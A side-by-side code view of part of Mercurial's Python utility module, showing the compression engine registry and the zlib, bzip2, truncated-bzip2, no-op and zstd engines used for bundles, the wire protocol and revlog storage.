3241 """
3241 """
3242 engine = self._engines[self._bundlenames[bundlename]]
3242 engine = self._engines[self._bundlenames[bundlename]]
3243 if not engine.available():
3243 if not engine.available():
3244 raise error.Abort(_('compression engine %s could not be loaded') %
3244 raise error.Abort(_('compression engine %s could not be loaded') %
3245 engine.name())
3245 engine.name())
3246 return engine
3246 return engine
3247
3247
3248 def forbundletype(self, bundletype):
3248 def forbundletype(self, bundletype):
3249 """Obtain a compression engine registered to a bundle type.
3249 """Obtain a compression engine registered to a bundle type.
3250
3250
3251 Will raise KeyError if the bundle type isn't registered.
3251 Will raise KeyError if the bundle type isn't registered.
3252
3252
3253 Will abort if the engine is known but not available.
3253 Will abort if the engine is known but not available.
3254 """
3254 """
3255 engine = self._engines[self._bundletypes[bundletype]]
3255 engine = self._engines[self._bundletypes[bundletype]]
3256 if not engine.available():
3256 if not engine.available():
3257 raise error.Abort(_('compression engine %s could not be loaded') %
3257 raise error.Abort(_('compression engine %s could not be loaded') %
3258 engine.name())
3258 engine.name())
3259 return engine
3259 return engine
3260
3260
3261 def supportedwireengines(self, role, onlyavailable=True):
3261 def supportedwireengines(self, role, onlyavailable=True):
3262 """Obtain compression engines that support the wire protocol.
3262 """Obtain compression engines that support the wire protocol.
3263
3263
3264 Returns a list of engines in prioritized order, most desired first.
3264 Returns a list of engines in prioritized order, most desired first.
3265
3265
3266 If ``onlyavailable`` is set, filter out engines that can't be
3266 If ``onlyavailable`` is set, filter out engines that can't be
3267 loaded.
3267 loaded.
3268 """
3268 """
3269 assert role in (SERVERROLE, CLIENTROLE)
3269 assert role in (SERVERROLE, CLIENTROLE)
3270
3270
3271 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3271 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3272
3272
3273 engines = [self._engines[e] for e in self._wiretypes.values()]
3273 engines = [self._engines[e] for e in self._wiretypes.values()]
3274 if onlyavailable:
3274 if onlyavailable:
3275 engines = [e for e in engines if e.available()]
3275 engines = [e for e in engines if e.available()]
3276
3276
3277 def getkey(e):
3277 def getkey(e):
3278 # Sort first by priority, highest first. In case of tie, sort
3278 # Sort first by priority, highest first. In case of tie, sort
3279 # alphabetically. This is arbitrary, but ensures output is
3279 # alphabetically. This is arbitrary, but ensures output is
3280 # stable.
3280 # stable.
3281 w = e.wireprotosupport()
3281 w = e.wireprotosupport()
3282 return -1 * getattr(w, attr), w.name
3282 return -1 * getattr(w, attr), w.name
3283
3283
3284 return list(sorted(engines, key=getkey))
3284 return list(sorted(engines, key=getkey))
3285
3285
3286 def forwiretype(self, wiretype):
3286 def forwiretype(self, wiretype):
3287 engine = self._engines[self._wiretypes[wiretype]]
3287 engine = self._engines[self._wiretypes[wiretype]]
3288 if not engine.available():
3288 if not engine.available():
3289 raise error.Abort(_('compression engine %s could not be loaded') %
3289 raise error.Abort(_('compression engine %s could not be loaded') %
3290 engine.name())
3290 engine.name())
3291 return engine
3291 return engine
3292
3292
3293 def forrevlogheader(self, header):
3293 def forrevlogheader(self, header):
3294 """Obtain a compression engine registered to a revlog header.
3294 """Obtain a compression engine registered to a revlog header.
3295
3295
3296 Will raise KeyError if the revlog header value isn't registered.
3296 Will raise KeyError if the revlog header value isn't registered.
3297 """
3297 """
3298 return self._engines[self._revlogheaders[header]]
3298 return self._engines[self._revlogheaders[header]]
3299
3299
3300 compengines = compressormanager()
3300 compengines = compressormanager()
3301
3301
3302 class compressionengine(object):
3302 class compressionengine(object):
3303 """Base class for compression engines.
3303 """Base class for compression engines.
3304
3304
3305 Compression engines must implement the interface defined by this class.
3305 Compression engines must implement the interface defined by this class.
3306 """
3306 """
3307 def name(self):
3307 def name(self):
3308 """Returns the name of the compression engine.
3308 """Returns the name of the compression engine.
3309
3309
3310 This is the key the engine is registered under.
3310 This is the key the engine is registered under.
3311
3311
3312 This method must be implemented.
3312 This method must be implemented.
3313 """
3313 """
3314 raise NotImplementedError()
3314 raise NotImplementedError()
3315
3315
3316 def available(self):
3316 def available(self):
3317 """Whether the compression engine is available.
3317 """Whether the compression engine is available.
3318
3318
3319 The intent of this method is to allow optional compression engines
3319 The intent of this method is to allow optional compression engines
3320 that may not be available in all installations (such as engines relying
3320 that may not be available in all installations (such as engines relying
3321 on C extensions that may not be present).
3321 on C extensions that may not be present).
3322 """
3322 """
3323 return True
3323 return True
3324
3324
3325 def bundletype(self):
3325 def bundletype(self):
3326 """Describes bundle identifiers for this engine.
3326 """Describes bundle identifiers for this engine.
3327
3327
3328 If this compression engine isn't supported for bundles, returns None.
3328 If this compression engine isn't supported for bundles, returns None.
3329
3329
3330 If this engine can be used for bundles, returns a 2-tuple of strings of
3330 If this engine can be used for bundles, returns a 2-tuple of strings of
3331 the user-facing "bundle spec" compression name and an internal
3331 the user-facing "bundle spec" compression name and an internal
3332 identifier used to denote the compression format within bundles. To
3332 identifier used to denote the compression format within bundles. To
3333 exclude the name from external usage, set the first element to ``None``.
3333 exclude the name from external usage, set the first element to ``None``.
3334
3334
3335 If bundle compression is supported, the class must also implement
3335 If bundle compression is supported, the class must also implement
3336 ``compressstream`` and `decompressorreader``.
3336 ``compressstream`` and `decompressorreader``.
3337
3337
3338 The docstring of this method is used in the help system to tell users
3338 The docstring of this method is used in the help system to tell users
3339 about this engine.
3339 about this engine.
3340 """
3340 """
3341 return None
3341 return None
3342
3342
3343 def wireprotosupport(self):
3343 def wireprotosupport(self):
3344 """Declare support for this compression format on the wire protocol.
3344 """Declare support for this compression format on the wire protocol.
3345
3345
3346 If this compression engine isn't supported for compressing wire
3346 If this compression engine isn't supported for compressing wire
3347 protocol payloads, returns None.
3347 protocol payloads, returns None.
3348
3348
3349 Otherwise, returns ``compenginewireprotosupport`` with the following
3349 Otherwise, returns ``compenginewireprotosupport`` with the following
3350 fields:
3350 fields:
3351
3351
3352 * String format identifier
3352 * String format identifier
3353 * Integer priority for the server
3353 * Integer priority for the server
3354 * Integer priority for the client
3354 * Integer priority for the client
3355
3355
3356 The integer priorities are used to order the advertisement of format
3356 The integer priorities are used to order the advertisement of format
3357 support by server and client. The highest integer is advertised
3357 support by server and client. The highest integer is advertised
3358 first. Integers with non-positive values aren't advertised.
3358 first. Integers with non-positive values aren't advertised.
3359
3359
3360 The priority values are somewhat arbitrary and only used for default
3360 The priority values are somewhat arbitrary and only used for default
3361 ordering. The relative order can be changed via config options.
3361 ordering. The relative order can be changed via config options.
3362
3362
3363 If wire protocol compression is supported, the class must also implement
3363 If wire protocol compression is supported, the class must also implement
3364 ``compressstream`` and ``decompressorreader``.
3364 ``compressstream`` and ``decompressorreader``.
3365 """
3365 """
3366 return None
3366 return None
3367
3367
3368 def revlogheader(self):
3368 def revlogheader(self):
3369 """Header added to revlog chunks that identifies this engine.
3369 """Header added to revlog chunks that identifies this engine.
3370
3370
3371 If this engine can be used to compress revlogs, this method should
3371 If this engine can be used to compress revlogs, this method should
3372 return the bytes used to identify chunks compressed with this engine.
3372 return the bytes used to identify chunks compressed with this engine.
3373 Else, the method should return ``None`` to indicate it does not
3373 Else, the method should return ``None`` to indicate it does not
3374 participate in revlog compression.
3374 participate in revlog compression.
3375 """
3375 """
3376 return None
3376 return None
3377
3377
3378 def compressstream(self, it, opts=None):
3378 def compressstream(self, it, opts=None):
3379 """Compress an iterator of chunks.
3379 """Compress an iterator of chunks.
3380
3380
3381 The method receives an iterator (ideally a generator) of chunks of
3381 The method receives an iterator (ideally a generator) of chunks of
3382 bytes to be compressed. It returns an iterator (ideally a generator)
3382 bytes to be compressed. It returns an iterator (ideally a generator)
3383 of bytes of chunks representing the compressed output.
3383 of bytes of chunks representing the compressed output.
3384
3384
3385 Optionally accepts an argument defining how to perform compression.
3385 Optionally accepts an argument defining how to perform compression.
3386 Each engine treats this argument differently.
3386 Each engine treats this argument differently.
3387 """
3387 """
3388 raise NotImplementedError()
3388 raise NotImplementedError()
3389
3389
3390 def decompressorreader(self, fh):
3390 def decompressorreader(self, fh):
3391 """Perform decompression on a file object.
3391 """Perform decompression on a file object.
3392
3392
3393 Argument is an object with a ``read(size)`` method that returns
3393 Argument is an object with a ``read(size)`` method that returns
3394 compressed data. Return value is an object with a ``read(size)`` that
3394 compressed data. Return value is an object with a ``read(size)`` that
3395 returns uncompressed data.
3395 returns uncompressed data.
3396 """
3396 """
3397 raise NotImplementedError()
3397 raise NotImplementedError()
3398
3398
3399 def revlogcompressor(self, opts=None):
3399 def revlogcompressor(self, opts=None):
3400 """Obtain an object that can be used to compress revlog entries.
3400 """Obtain an object that can be used to compress revlog entries.
3401
3401
3402 The object has a ``compress(data)`` method that compresses binary
3402 The object has a ``compress(data)`` method that compresses binary
3403 data. This method returns compressed binary data or ``None`` if
3403 data. This method returns compressed binary data or ``None`` if
3404 the data could not be compressed (too small, not compressible, etc).
3404 the data could not be compressed (too small, not compressible, etc).
3405 The returned data should have a header uniquely identifying this
3405 The returned data should have a header uniquely identifying this
3406 compression format so decompression can be routed to this engine.
3406 compression format so decompression can be routed to this engine.
3407 This header should be identified by the ``revlogheader()`` return
3407 This header should be identified by the ``revlogheader()`` return
3408 value.
3408 value.
3409
3409
3410 The object has a ``decompress(data)`` method that decompresses
3410 The object has a ``decompress(data)`` method that decompresses
3411 data. The method will only be called if ``data`` begins with
3411 data. The method will only be called if ``data`` begins with
3412 ``revlogheader()``. The method should return the raw, uncompressed
3412 ``revlogheader()``. The method should return the raw, uncompressed
3413 data or raise a ``RevlogError``.
3413 data or raise a ``RevlogError``.
3414
3414
3415 The object is reusable but is not thread safe.
3415 The object is reusable but is not thread safe.
3416 """
3416 """
3417 raise NotImplementedError()
3417 raise NotImplementedError()
3418
3418
3419 class _zlibengine(compressionengine):
3419 class _zlibengine(compressionengine):
3420 def name(self):
3420 def name(self):
3421 return 'zlib'
3421 return 'zlib'
3422
3422
3423 def bundletype(self):
3423 def bundletype(self):
3424 """zlib compression using the DEFLATE algorithm.
3424 """zlib compression using the DEFLATE algorithm.
3425
3425
3426 All Mercurial clients should support this format. The compression
3426 All Mercurial clients should support this format. The compression
3427 algorithm strikes a reasonable balance between compression ratio
3427 algorithm strikes a reasonable balance between compression ratio
3428 and size.
3428 and size.
3429 """
3429 """
3430 return 'gzip', 'GZ'
3430 return 'gzip', 'GZ'
3431
3431
3432 def wireprotosupport(self):
3432 def wireprotosupport(self):
3433 return compewireprotosupport('zlib', 20, 20)
3433 return compewireprotosupport('zlib', 20, 20)
3434
3434
3435 def revlogheader(self):
3435 def revlogheader(self):
3436 return 'x'
3436 return 'x'
3437
3437
3438 def compressstream(self, it, opts=None):
3438 def compressstream(self, it, opts=None):
3439 opts = opts or {}
3439 opts = opts or {}
3440
3440
3441 z = zlib.compressobj(opts.get('level', -1))
3441 z = zlib.compressobj(opts.get('level', -1))
3442 for chunk in it:
3442 for chunk in it:
3443 data = z.compress(chunk)
3443 data = z.compress(chunk)
3444 # Not all calls to compress emit data. It is cheaper to inspect
3444 # Not all calls to compress emit data. It is cheaper to inspect
3445 # here than to feed empty chunks through generator.
3445 # here than to feed empty chunks through generator.
3446 if data:
3446 if data:
3447 yield data
3447 yield data
3448
3448
3449 yield z.flush()
3449 yield z.flush()
3450
3450
3451 def decompressorreader(self, fh):
3451 def decompressorreader(self, fh):
3452 def gen():
3452 def gen():
3453 d = zlib.decompressobj()
3453 d = zlib.decompressobj()
3454 for chunk in filechunkiter(fh):
3454 for chunk in filechunkiter(fh):
3455 while chunk:
3455 while chunk:
3456 # Limit output size to limit memory.
3456 # Limit output size to limit memory.
3457 yield d.decompress(chunk, 2 ** 18)
3457 yield d.decompress(chunk, 2 ** 18)
3458 chunk = d.unconsumed_tail
3458 chunk = d.unconsumed_tail
3459
3459
3460 return chunkbuffer(gen())
3460 return chunkbuffer(gen())
3461
3461
3462 class zlibrevlogcompressor(object):
3462 class zlibrevlogcompressor(object):
3463 def compress(self, data):
3463 def compress(self, data):
3464 insize = len(data)
3464 insize = len(data)
3465 # Caller handles empty input case.
3465 # Caller handles empty input case.
3466 assert insize > 0
3466 assert insize > 0
3467
3467
3468 if insize < 44:
3468 if insize < 44:
3469 return None
3469 return None
3470
3470
3471 elif insize <= 1000000:
3471 elif insize <= 1000000:
3472 compressed = zlib.compress(data)
3472 compressed = zlib.compress(data)
3473 if len(compressed) < insize:
3473 if len(compressed) < insize:
3474 return compressed
3474 return compressed
3475 return None
3475 return None
3476
3476
3477 # zlib makes an internal copy of the input buffer, doubling
3477 # zlib makes an internal copy of the input buffer, doubling
3478 # memory usage for large inputs. So do streaming compression
3478 # memory usage for large inputs. So do streaming compression
3479 # on large inputs.
3479 # on large inputs.
3480 else:
3480 else:
3481 z = zlib.compressobj()
3481 z = zlib.compressobj()
3482 parts = []
3482 parts = []
3483 pos = 0
3483 pos = 0
3484 while pos < insize:
3484 while pos < insize:
3485 pos2 = pos + 2**20
3485 pos2 = pos + 2**20
3486 parts.append(z.compress(data[pos:pos2]))
3486 parts.append(z.compress(data[pos:pos2]))
3487 pos = pos2
3487 pos = pos2
3488 parts.append(z.flush())
3488 parts.append(z.flush())
3489
3489
3490 if sum(map(len, parts)) < insize:
3490 if sum(map(len, parts)) < insize:
3491 return ''.join(parts)
3491 return ''.join(parts)
3492 return None
3492 return None
3493
3493
3494 def decompress(self, data):
3494 def decompress(self, data):
3495 try:
3495 try:
3496 return zlib.decompress(data)
3496 return zlib.decompress(data)
3497 except zlib.error as e:
3497 except zlib.error as e:
3498 raise error.RevlogError(_('revlog decompress error: %s') %
3498 raise error.RevlogError(_('revlog decompress error: %s') %
3499 str(e))
3499 str(e))
3500
3500
3501 def revlogcompressor(self, opts=None):
3501 def revlogcompressor(self, opts=None):
3502 return self.zlibrevlogcompressor()
3502 return self.zlibrevlogcompressor()
3503
3503
3504 compengines.register(_zlibengine())
3504 compengines.register(_zlibengine())
3505
3505
3506 class _bz2engine(compressionengine):
3506 class _bz2engine(compressionengine):
3507 def name(self):
3507 def name(self):
3508 return 'bz2'
3508 return 'bz2'
3509
3509
3510 def bundletype(self):
3510 def bundletype(self):
3511 """An algorithm that produces smaller bundles than ``gzip``.
3511 """An algorithm that produces smaller bundles than ``gzip``.
3512
3512
3513 All Mercurial clients should support this format.
3513 All Mercurial clients should support this format.
3514
3514
3515 This engine will likely produce smaller bundles than ``gzip`` but
3515 This engine will likely produce smaller bundles than ``gzip`` but
3516 will be significantly slower, both during compression and
3516 will be significantly slower, both during compression and
3517 decompression.
3517 decompression.
3518
3518
3519 If available, the ``zstd`` engine can yield similar or better
3519 If available, the ``zstd`` engine can yield similar or better
3520 compression at much higher speeds.
3520 compression at much higher speeds.
3521 """
3521 """
3522 return 'bzip2', 'BZ'
3522 return 'bzip2', 'BZ'
3523
3523
3524 # We declare a protocol name but don't advertise by default because
3524 # We declare a protocol name but don't advertise by default because
3525 # it is slow.
3525 # it is slow.
3526 def wireprotosupport(self):
3526 def wireprotosupport(self):
3527 return compewireprotosupport('bzip2', 0, 0)
3527 return compewireprotosupport('bzip2', 0, 0)
3528
3528
3529 def compressstream(self, it, opts=None):
3529 def compressstream(self, it, opts=None):
3530 opts = opts or {}
3530 opts = opts or {}
3531 z = bz2.BZ2Compressor(opts.get('level', 9))
3531 z = bz2.BZ2Compressor(opts.get('level', 9))
3532 for chunk in it:
3532 for chunk in it:
3533 data = z.compress(chunk)
3533 data = z.compress(chunk)
3534 if data:
3534 if data:
3535 yield data
3535 yield data
3536
3536
3537 yield z.flush()
3537 yield z.flush()
3538
3538
3539 def decompressorreader(self, fh):
3539 def decompressorreader(self, fh):
3540 def gen():
3540 def gen():
3541 d = bz2.BZ2Decompressor()
3541 d = bz2.BZ2Decompressor()
3542 for chunk in filechunkiter(fh):
3542 for chunk in filechunkiter(fh):
3543 yield d.decompress(chunk)
3543 yield d.decompress(chunk)
3544
3544
3545 return chunkbuffer(gen())
3545 return chunkbuffer(gen())
3546
3546
3547 compengines.register(_bz2engine())
3547 compengines.register(_bz2engine())
3548
3548
3549 class _truncatedbz2engine(compressionengine):
3549 class _truncatedbz2engine(compressionengine):
3550 def name(self):
3550 def name(self):
3551 return 'bz2truncated'
3551 return 'bz2truncated'
3552
3552
3553 def bundletype(self):
3553 def bundletype(self):
3554 return None, '_truncatedBZ'
3554 return None, '_truncatedBZ'
3555
3555
3556 # We don't implement compressstream because it is hackily handled elsewhere.
3556 # We don't implement compressstream because it is hackily handled elsewhere.
3557
3557
3558 def decompressorreader(self, fh):
3558 def decompressorreader(self, fh):
3559 def gen():
3559 def gen():
3560 # The input stream doesn't have the 'BZ' header. So add it back.
3560 # The input stream doesn't have the 'BZ' header. So add it back.
3561 d = bz2.BZ2Decompressor()
3561 d = bz2.BZ2Decompressor()
3562 d.decompress('BZ')
3562 d.decompress('BZ')
3563 for chunk in filechunkiter(fh):
3563 for chunk in filechunkiter(fh):
3564 yield d.decompress(chunk)
3564 yield d.decompress(chunk)
3565
3565
3566 return chunkbuffer(gen())
3566 return chunkbuffer(gen())
3567
3567
3568 compengines.register(_truncatedbz2engine())
3568 compengines.register(_truncatedbz2engine())
3569
3569
3570 class _noopengine(compressionengine):
3570 class _noopengine(compressionengine):
3571 def name(self):
3571 def name(self):
3572 return 'none'
3572 return 'none'
3573
3573
3574 def bundletype(self):
3574 def bundletype(self):
3575 """No compression is performed.
3575 """No compression is performed.
3576
3576
3577 Use this compression engine to explicitly disable compression.
3577 Use this compression engine to explicitly disable compression.
3578 """
3578 """
3579 return 'none', 'UN'
3579 return 'none', 'UN'
3580
3580
3581 # Clients always support uncompressed payloads. Servers don't because
3581 # Clients always support uncompressed payloads. Servers don't because
3582 # unless you are on a fast network, uncompressed payloads can easily
3582 # unless you are on a fast network, uncompressed payloads can easily
3583 # saturate your network pipe.
3583 # saturate your network pipe.
3584 def wireprotosupport(self):
3584 def wireprotosupport(self):
3585 return compewireprotosupport('none', 0, 10)
3585 return compewireprotosupport('none', 0, 10)
3586
3586
3587 # We don't implement revlogheader because it is handled specially
3587 # We don't implement revlogheader because it is handled specially
3588 # in the revlog class.
3588 # in the revlog class.
3589
3589
3590 def compressstream(self, it, opts=None):
3590 def compressstream(self, it, opts=None):
3591 return it
3591 return it
3592
3592
3593 def decompressorreader(self, fh):
3593 def decompressorreader(self, fh):
3594 return fh
3594 return fh
3595
3595
3596 class nooprevlogcompressor(object):
3596 class nooprevlogcompressor(object):
3597 def compress(self, data):
3597 def compress(self, data):
3598 return None
3598 return None
3599
3599
3600 def revlogcompressor(self, opts=None):
3600 def revlogcompressor(self, opts=None):
3601 return self.nooprevlogcompressor()
3601 return self.nooprevlogcompressor()
3602
3602
3603 compengines.register(_noopengine())
3603 compengines.register(_noopengine())
3604
3604
3605 class _zstdengine(compressionengine):
3605 class _zstdengine(compressionengine):
3606 def name(self):
3606 def name(self):
3607 return 'zstd'
3607 return 'zstd'
3608
3608
3609 @propertycache
3609 @propertycache
3610 def _module(self):
3610 def _module(self):
3611 # Not all installs have the zstd module available. So defer importing
3611 # Not all installs have the zstd module available. So defer importing
3612 # until first access.
3612 # until first access.
3613 try:
3613 try:
3614 from . import zstd
3614 from . import zstd
3615 # Force delayed import.
3615 # Force delayed import.
3616 zstd.__version__
3616 zstd.__version__
3617 return zstd
3617 return zstd
3618 except ImportError:
3618 except ImportError:
3619 return None
3619 return None
3620
3620
3621 def available(self):
3621 def available(self):
3622 return bool(self._module)
3622 return bool(self._module)
3623
3623
3624 def bundletype(self):
3624 def bundletype(self):
3625 """A modern compression algorithm that is fast and highly flexible.
3625 """A modern compression algorithm that is fast and highly flexible.
3626
3626
3627 Only supported by Mercurial 4.1 and newer clients.
3627 Only supported by Mercurial 4.1 and newer clients.
3628
3628
3629 With the default settings, zstd compression is both faster and yields
3629 With the default settings, zstd compression is both faster and yields
3630 better compression than ``gzip``. It also frequently yields better
3630 better compression than ``gzip``. It also frequently yields better
3631 compression than ``bzip2`` while operating at much higher speeds.
3631 compression than ``bzip2`` while operating at much higher speeds.
3632
3632
3633 If this engine is available and backwards compatibility is not a
3633 If this engine is available and backwards compatibility is not a
3634 concern, it is likely the best available engine.
3634 concern, it is likely the best available engine.
3635 """
3635 """
3636 return 'zstd', 'ZS'
3636 return 'zstd', 'ZS'
3637
3637
3638 def wireprotosupport(self):
3638 def wireprotosupport(self):
3639 return compewireprotosupport('zstd', 50, 50)
3639 return compewireprotosupport('zstd', 50, 50)
3640
3640
3641 def revlogheader(self):
3641 def revlogheader(self):
3642 return '\x28'
3642 return '\x28'
3643
3643
3644 def compressstream(self, it, opts=None):
3644 def compressstream(self, it, opts=None):
3645 opts = opts or {}
3645 opts = opts or {}
3646 # zstd level 3 is almost always significantly faster than zlib
3646 # zstd level 3 is almost always significantly faster than zlib
3647 # while providing no worse compression. It strikes a good balance
3647 # while providing no worse compression. It strikes a good balance
3648 # between speed and compression.
3648 # between speed and compression.
3649 level = opts.get('level', 3)
3649 level = opts.get('level', 3)
3650
3650
3651 zstd = self._module
3651 zstd = self._module
3652 z = zstd.ZstdCompressor(level=level).compressobj()
3652 z = zstd.ZstdCompressor(level=level).compressobj()
3653 for chunk in it:
3653 for chunk in it:
3654 data = z.compress(chunk)
3654 data = z.compress(chunk)
3655 if data:
3655 if data:
3656 yield data
3656 yield data
3657
3657
3658 yield z.flush()
3658 yield z.flush()
3659
3659
3660 def decompressorreader(self, fh):
3660 def decompressorreader(self, fh):
3661 zstd = self._module
3661 zstd = self._module
3662 dctx = zstd.ZstdDecompressor()
3662 dctx = zstd.ZstdDecompressor()
3663 return chunkbuffer(dctx.read_from(fh))
3663 return chunkbuffer(dctx.read_from(fh))
3664
3664
3665 class zstdrevlogcompressor(object):
3665 class zstdrevlogcompressor(object):
3666 def __init__(self, zstd, level=3):
3666 def __init__(self, zstd, level=3):
3667 # Writing the content size adds a few bytes to the output. However,
3667 # Writing the content size adds a few bytes to the output. However,
3668 # it allows decompression to be more optimal since we can
3668 # it allows decompression to be more optimal since we can
3669 # pre-allocate a buffer to hold the result.
3669 # pre-allocate a buffer to hold the result.
3670 self._cctx = zstd.ZstdCompressor(level=level,
3670 self._cctx = zstd.ZstdCompressor(level=level,
3671 write_content_size=True)
3671 write_content_size=True)
3672 self._dctx = zstd.ZstdDecompressor()
3672 self._dctx = zstd.ZstdDecompressor()
3673 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3673 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3674 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3674 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3675
3675
3676 def compress(self, data):
3676 def compress(self, data):
3677 insize = len(data)
3677 insize = len(data)
3678 # Caller handles empty input case.
3678 # Caller handles empty input case.
3679 assert insize > 0
3679 assert insize > 0
3680
3680
3681 if insize < 50:
3681 if insize < 50:
3682 return None
3682 return None
3683
3683
3684 elif insize <= 1000000:
3684 elif insize <= 1000000:
3685 compressed = self._cctx.compress(data)
3685 compressed = self._cctx.compress(data)
3686 if len(compressed) < insize:
3686 if len(compressed) < insize:
3687 return compressed
3687 return compressed
3688 return None
3688 return None
3689 else:
3689 else:
3690 z = self._cctx.compressobj()
3690 z = self._cctx.compressobj()
3691 chunks = []
3691 chunks = []
3692 pos = 0
3692 pos = 0
3693 while pos < insize:
3693 while pos < insize:
3694 pos2 = pos + self._compinsize
3694 pos2 = pos + self._compinsize
3695 chunk = z.compress(data[pos:pos2])
3695 chunk = z.compress(data[pos:pos2])
3696 if chunk:
3696 if chunk:
3697 chunks.append(chunk)
3697 chunks.append(chunk)
3698 pos = pos2
3698 pos = pos2
3699 chunks.append(z.flush())
3699 chunks.append(z.flush())
3700
3700
3701 if sum(map(len, chunks)) < insize:
3701 if sum(map(len, chunks)) < insize:
3702 return ''.join(chunks)
3702 return ''.join(chunks)
3703 return None
3703 return None
3704
3704
3705 def decompress(self, data):
3705 def decompress(self, data):
3706 insize = len(data)
3706 insize = len(data)
3707
3707
3708 try:
3708 try:
3709 # This was measured to be faster than other streaming
3709 # This was measured to be faster than other streaming
3710 # decompressors.
3710 # decompressors.
3711 dobj = self._dctx.decompressobj()
3711 dobj = self._dctx.decompressobj()
3712 chunks = []
3712 chunks = []
3713 pos = 0
3713 pos = 0
3714 while pos < insize:
3714 while pos < insize:
3715 pos2 = pos + self._decompinsize
3715 pos2 = pos + self._decompinsize
3716 chunk = dobj.decompress(data[pos:pos2])
3716 chunk = dobj.decompress(data[pos:pos2])
3717 if chunk:
3717 if chunk:
3718 chunks.append(chunk)
3718 chunks.append(chunk)
3719 pos = pos2
3719 pos = pos2
3720 # Frame should be exhausted, so no finish() API.
3720 # Frame should be exhausted, so no finish() API.
3721
3721
3722 return ''.join(chunks)
3722 return ''.join(chunks)
3723 except Exception as e:
3723 except Exception as e:
3724 raise error.RevlogError(_('revlog decompress error: %s') %
3724 raise error.RevlogError(_('revlog decompress error: %s') %
3725 str(e))
3725 str(e))
3726
3726
3727 def revlogcompressor(self, opts=None):
3727 def revlogcompressor(self, opts=None):
3728 opts = opts or {}
3728 opts = opts or {}
3729 return self.zstdrevlogcompressor(self._module,
3729 return self.zstdrevlogcompressor(self._module,
3730 level=opts.get('level', 3))
3730 level=opts.get('level', 3))
3731
3731
3732 compengines.register(_zstdengine())
3732 compengines.register(_zstdengine())
3733
3733
3734 def bundlecompressiontopics():
3734 def bundlecompressiontopics():
3735 """Obtains a list of available bundle compressions for use in help."""
3735 """Obtains a list of available bundle compressions for use in help."""
3736 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3736 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3737 items = {}
3737 items = {}
3738
3738
3739 # We need to format the docstring. So use a dummy object/type to hold it
3739 # We need to format the docstring. So use a dummy object/type to hold it
3740 # rather than mutating the original.
3740 # rather than mutating the original.
3741 class docobject(object):
3741 class docobject(object):
3742 pass
3742 pass
3743
3743
3744 for name in compengines:
3744 for name in compengines:
3745 engine = compengines[name]
3745 engine = compengines[name]
3746
3746
3747 if not engine.available():
3747 if not engine.available():
3748 continue
3748 continue
3749
3749
3750 bt = engine.bundletype()
3750 bt = engine.bundletype()
3751 if not bt or not bt[0]:
3751 if not bt or not bt[0]:
3752 continue
3752 continue
3753
3753
3754 doc = pycompat.sysstr('``%s``\n %s') % (
3754 doc = pycompat.sysstr('``%s``\n %s') % (
3755 bt[0], engine.bundletype.__doc__)
3755 bt[0], engine.bundletype.__doc__)
3756
3756
3757 value = docobject()
3757 value = docobject()
3758 value.__doc__ = doc
3758 value.__doc__ = doc
3759 value._origdoc = engine.bundletype.__doc__
3759 value._origdoc = engine.bundletype.__doc__
3760 value._origfunc = engine.bundletype
3760 value._origfunc = engine.bundletype
3761
3761
3762 items[bt[0]] = value
3762 items[bt[0]] = value
3763
3763
3764 return items
3764 return items
3765
3765
3766 i18nfunctions = bundlecompressiontopics().values()
3766 i18nfunctions = bundlecompressiontopics().values()
3767
3767
3768 # convenient shortcut
3768 # convenient shortcut
3769 dst = debugstacktrace
3769 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now